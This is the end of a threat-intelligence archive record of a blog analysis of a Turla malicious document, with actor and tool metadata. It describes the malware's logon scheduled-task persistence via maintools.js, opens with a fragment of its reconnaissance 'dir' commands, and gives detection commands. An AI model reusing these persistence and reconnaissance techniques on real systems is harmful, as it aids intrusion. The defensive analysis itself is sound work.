\u003e\u003e \",\"dir \\x22%programfiles(x86)%\\x22 \u003e\u003e \",\"dir \\x22%programfiles%\\x22 \u003e\u003e \",\"dir\r\n%appdata% \u003e\u003e\");\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 17 of 20\n\nBut the most interesting part is how the persistence is done, via a schedule Service (schedule task).\r\nA schedule task with name \"TaskManager\" under a folder WPD is created.\r\nThis task executes when the user logs in and calls the JS code\r\n c:\\Users\\user1\\AppData\\Local\\Microsoft\\Windows\\maintools.js EzZETcSXyKAdF_e5I2i1.\r\nWith the Schedule Task tool from Windows, it is possible to spot it\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 18 of 20\n\nA way to check it via the CMD line is dumping all the schedule tasks and exporting to a file. For example, with a\r\ncommand like this: \r\nschtasks /query /fo csv /v  \u003e output.csv\r\nWhich permits to see the full schedule task:\r\n\"PC-DEV\",\"\\WPD\\TaskManager\",\"N/A\",\"Ready\",\"Interactive\r\nonly\",\"N/A\",\"1\",\"user1\",\"c:\\Users\\user1\\AppData\\Local\\Microsoft\\Windows\\maintools.js\r\nEzZETcSXyKAdF_e5I2i1\",\"c:\\Users\\user1\\AppData\\Local\\Microsoft\\Windows\\\",\"Windows Task\r\nManager\",\"Enabled\",\"Disabled\",\"Stop On Battery Mode, No Start On\r\nBatteries\",\"user1\",\"Enabled\",\"72:00:00\",\"Scheduling data is not available in this format.\",\"At logon\r\ntime\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\"\r\nIn a corporate environment, it is possible to search for that artifact via a query with PowerShell. For example,\r\nsomething  like this would make the work:\r\n Invoke-Command -ComputerName COMPUTERNAME -ScriptBlock {schtasks /query /fo csv /v | findstr /i\r\nmaintools}  -credential  USER\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 19 of 20\n\nSource: https://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html" ], "report_names": [ "analysis-of-malicious-doc-used-by-turla.html" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434463, "ts_updated_at": 1775792015, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/074b04779bd356b303c6cc77c1afc7853c582e59.pdf", "text": "https://archive.orkl.eu/074b04779bd356b303c6cc77c1afc7853c582e59.txt", "img": "https://archive.orkl.eu/074b04779bd356b303c6cc77c1afc7853c582e59.jpg" } }